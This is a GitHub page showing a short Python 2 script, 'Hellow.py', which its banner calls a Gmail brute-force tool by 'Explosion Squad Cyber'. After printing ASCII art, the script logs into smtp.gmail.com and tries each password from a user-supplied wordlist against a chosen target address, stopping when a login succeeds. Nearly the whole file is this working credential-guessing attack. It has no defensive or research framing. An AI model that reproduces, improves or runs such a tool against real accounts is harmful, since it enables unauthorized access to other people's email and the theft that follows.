-
Notifications
You must be signed in to change notification settings - Fork 22
/
Copy pathHellow.py
62 lines (55 loc) · 2.77 KB
/
Hellow.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
import smtplib
from os import system
def hell():
mawar = "\033[31;m1"
susu1 = "\033[37;1m"
hole1 = "\033[32;1m"
print hole1+"..%%%%....%%%%...%%......%%....."
print hole1+".%%..%%..%%..%%..%%......%%....."
print hole1+".%%......%%%%%%..%%......%%....."
print hole1+".%%..%%..%%..%%..%%......%%....."
print hole1+"..%%%%...%%..%%..%%%%%%..%%%%%%."
print hole1+"................................"
print hole1+"%%%%%%..%%%%%....%%%%...%%...%%."
print hole1+"%%......%%..%%..%%..%%..%%%.%%%."
print hole1+"%%%%....%%%%%...%%..%%..%%.%.%%."
print hole1+"%%......%%..%%..%%..%%..%%...%%."
print hole1+"%%......%%..%%...%%%%...%%...%%."
print hole1+"................................"
print hole1+".%%..%%..%%%%%%..%%......%%....."
print hole1+".%%..%%..%%......%%......%%....."
print hole1+".%%%%%%..%%%%....%%......%%....."
print hole1+".%%..%%..%%......%%......%%....."
print hole1+".%%..%%..%%%%%%..%%%%%%..%%%%%%."
print hole1+"................................"
print "|=======-<><><><><><><><><><><><>-=======|"
print "<======= !Coded By Nelo.F4 =======>"
print "<======= !Tools Bruteforce Gmail =======>"
print "<======= !Explosion Squad Cyber =======>"
print "|=======-<><><><><><><><><><><><>-=======|\n"
hell()
mawar = "\033[31;1m"
smtpserver = smtplib.SMTP("smtp.gmail.com", 587)
smtpserver.ehlo()
smtpserver.starttls()
user = raw_input(mawar+"-->[!] Enter Email Target: ")
passwd = raw_input(mawar+"-->[!] Path and Name Wordlist: ")
passwd = open(passwd, "r")
for password in passwd:
try:
smtpserver.login(user, password)
system("clear")
hell()
print mawar+"\n"
print mawar+"-->[!] Password Detected :" + password
break
except smtplib.SMTPAuthenticationError as e:
error = str(e)
if error[14] == '<':
system('clear')
hell()
print "\n"
print mawar+"-->[!] Password Zonk!:" + password
break
else:
print mawar+"-->[!] Password Zonk!:" + password